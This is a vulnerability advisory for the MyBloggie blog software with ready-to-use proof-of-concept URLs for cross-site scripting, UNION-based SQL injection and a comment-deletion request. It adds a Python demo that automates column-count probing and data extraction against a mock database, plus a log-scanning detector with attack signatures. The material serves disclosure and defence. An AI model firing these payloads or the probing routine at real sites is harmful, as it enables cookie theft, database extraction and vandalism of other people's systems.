
MyBloggie Multiple Input Validation Vulnerabilities

An exploit is not required. The following proof of concept examples are available:

Cross-site scripting:
http://www.example.com/mybloggie/index.php?month_no=3&year=%3Cscript%3Ealert(document.cookies)%3C/script%3E

HTML injection (each percent-encoded payload below decodes to <script>alert(document.cookie)</script>):
http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3EC

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E

http://www.example.com/mybloggie/index.php?mode=viewid&post_id=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E

SQL injection (the trailing /* comments out the rest of the original query; the number of NULL placeholders matches the column count of the SELECT being injected into, one for the search query and ten for the others):
http://www.example.com/mybloggie/index.php?mode=search&keyword=trivero%'%20UNION%20SELECT%20null/*

http://www.example.com/mybloggie/index.php?month_no=1&year=1&mode=viewdate&date_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewcat&cat_id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewmonth&month_no=1&year=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*

http://www.example.com/mybloggie/index.php?mode=viewid&post_id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/*
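
To make the mechanics of the UNION payloads concrete, here is an added example (not code from MyBloggie or from the advisory author) that reproduces the pattern in Python against an in-memory SQLite database. The ten-column posts table, its two rows and the fetch_post_* functions are assumptions chosen to line up with the ten NULLs in the post_id PoC; the real MyBloggie schema and queries are not on this page. The PoCs are written for MySQL, where an unterminated /* comments out the rest of the statement; SQLite's tokenizer treats it the same way, which is what makes the demonstration portable. The example goes one step past the PoC list: once the column count is known, any NULL slot can carry an expression, shown here with sqlite_version().

```python
import sqlite3

# Hypothetical ten-column posts table. The real MyBloggie schema is not given on this page;
# ten columns were chosen so that the post_id PoC above (ten NULLs) lines up with it.
COLUMNS = ("post_id, cat_id, user_id, title, message, post_time, "
           "month_no, year, comments, ratings")


def make_demo_db():
    """In-memory database with constructed sample rows (not data from any real blog)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE posts ({COLUMNS})")
    conn.executemany(
        f"INSERT INTO posts ({COLUMNS}) VALUES (?,?,?,?,?,?,?,?,?,?)",
        [
            (1, 2, 1, "Hello world", "first post", 1231200000, 1, 2009, 0, 0),
            (2, 2, 1, "Second post", "more text", 1231286400, 1, 2009, 3, 5),
        ],
    )
    return conn


def fetch_post_vulnerable(conn, post_id):
    """The pattern behind the advisory: the raw request parameter is spliced into the SQL
    text. Everything after an injected '/*' is swallowed as a comment, so the trailing
    ORDER BY never constrains the attacker's UNION."""
    sql = f"SELECT {COLUMNS} FROM posts WHERE post_id={post_id} ORDER BY post_time DESC"
    return conn.execute(sql).fetchall()


def fetch_post_safe(conn, post_id):
    """Hardened form: reject anything that is not an integer, then bind the value as a
    parameter so the database never parses it as SQL."""
    try:
        pid = int(post_id)
    except (TypeError, ValueError):
        return []
    sql = f"SELECT {COLUMNS} FROM posts WHERE post_id=? ORDER BY post_time DESC"
    return conn.execute(sql, (pid,)).fetchall()


def union_probe_payload(n):
    """The post_id value used by the PoC URLs, with n NULL placeholders."""
    return "1 UNION SELECT " + ",".join(["null"] * n) + "/*"


def probe_union_columns(fetch, max_cols=20):
    """Recover the column count the way the PoC list was built: grow the NULL list until the
    database stops rejecting the UNION and an all-NULL row shows up in the result.
    Returns None when no payload produces such a row (e.g. a parameterised query)."""
    for n in range(1, max_cols + 1):
        try:
            rows = fetch(union_probe_payload(n))
        except sqlite3.OperationalError:
            continue  # "SELECTs ... do not have the same number of result columns"
        if any(all(v is None for v in row) for row in rows):
            return n
    return None


def union_extract_version(conn):
    """With the count known, any NULL slot can carry an expression or a column from another
    table. Here the fourth slot (the title column) carries sqlite_version(); the assumption
    is that this slot is rendered to the page, as a post title would be."""
    slots = ["null"] * 10
    slots[3] = "sqlite_version()"
    payload = "1 UNION SELECT " + ",".join(slots) + "/*"
    rows = fetch_post_vulnerable(conn, payload)
    return [r[3] for r in rows if r[0] is None][0]


def demo():
    """Column count recovered from the vulnerable and the hardened query."""
    conn = make_demo_db()
    vuln = probe_union_columns(lambda p: fetch_post_vulnerable(conn, p))
    safe = probe_union_columns(lambda p: fetch_post_safe(conn, p))
    return vuln, safe


if __name__ == "__main__":
    print(demo())  # (10, None)
```

The integer cast in fetch_post_safe is what the viewid, viewcat, viewmonth and viewdate parameters all need; the search keyword is free text and has to rely on parameter binding alone.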

Comment deletion:
http://www.example.com/mybloggie/index.php?mode=delcom&comment_id=[comment_id]&confirm=yes
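
From the defensive side, the PoC URLs above are exactly what a log review should catch. The following added example (not part of the advisory) scans a few constructed Apache-style access log lines built from those URLs, decodes every query parameter before matching, and also flags the delcom request, since it is a GET that changes state. The sample lines, IP addresses and signature regexes are assumptions made for the demonstration. The point it makes beyond the PoC list is that the HTML-injection payloads are fully percent-encoded, so a signature applied to the raw log line never sees the string "<script"; a double-encoded variant is included to show why the decoding has to be repeated.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache-style access log lines modelled on the PoC URLs above; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2009:12:00:00 +0000] "GET /mybloggie/index.php?mode=viewid&post_id=3 HTTP/1.1" 200 4123
10.0.0.9 - - [01/Jan/2009:12:00:01 +0000] "GET /mybloggie/index.php?mode=viewcat&cat_id=%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E HTTP/1.1" 200 3980
10.0.0.9 - - [01/Jan/2009:12:00:02 +0000] "GET /mybloggie/index.php?mode=viewid&post_id=1%20UNION%20SELECT%20null,null,null,null,null,null,null,null,null,null/* HTTP/1.1" 200 4011
10.0.0.9 - - [01/Jan/2009:12:00:03 +0000] "GET /mybloggie/index.php?mode=viewmonth&month_no=%253C%2573%2563%2572%2569%2570%2574%253E HTTP/1.1" 200 3901
10.0.0.9 - - [01/Jan/2009:12:00:04 +0000] "GET /mybloggie/index.php?mode=search&keyword=trivero%'%20UNION%20SELECT%20null/* HTTP/1.1" 200 3877
10.0.0.9 - - [01/Jan/2009:12:00:05 +0000] "GET /mybloggie/index.php?mode=delcom&comment_id=7&confirm=yes HTTP/1.1" 302 0
"""

# Common log format: client, identity, user, [timestamp], "METHOD target HTTP/x.y", status, bytes.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Signatures are applied to the decoded parameter value, never to the raw line.
SIGNATURES = {
    "xss": re.compile(r"<\s*/?\s*script\b|javascript\s*:|\bon[a-z]+\s*=", re.I),
    "sqli": re.compile(r"\bunion\b.{0,60}?\bselect\b|/\*|--\s|'\s*(?:or|and)\b", re.I),
}


def fully_decode(value, rounds=3):
    """Percent-decode until the value stops changing (bounded), so single- and
    double-encoded payloads look the same to the signatures."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def classify_request(target):
    """Findings for one request target as a list of (category, parameter) tuples."""
    params = parse_qsl(urlsplit(target).query, keep_blank_values=True)
    findings = []
    for name, raw in params:
        value = fully_decode(raw)
        for category, pattern in SIGNATURES.items():
            if pattern.search(value):
                findings.append((category, name))
    fields = dict(params)
    # The delcom PoC deletes on a plain GET once confirm=yes is present.
    if fields.get("mode") == "delcom" and fields.get("confirm") == "yes":
        findings.append(("state-changing-get", "comment_id"))
    return findings


def scan_log(text):
    """Return (client_ip, status, findings) for every request that triggers a signature."""
    hits = []
    for line in text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        findings = classify_request(m.group("target"))
        if findings:
            hits.append((m.group("ip"), int(m.group("status")), findings))
    return hits


def raw_contains_script(line):
    """The naive check applied to the undecoded line; it misses every encoded PoC above."""
    return "<script" in line.lower()


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 response to a UNION probe or an encoded script tag is worth an alert on its own; the 302 on the delcom request is the normal redirect after a deletion, so that line is only interesting together with who issued it and from where.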

Alberto Trivero - codebug.org has supplied the following exploit for the SQL injection vulnerability:
Copyright 2009, SecurityFocus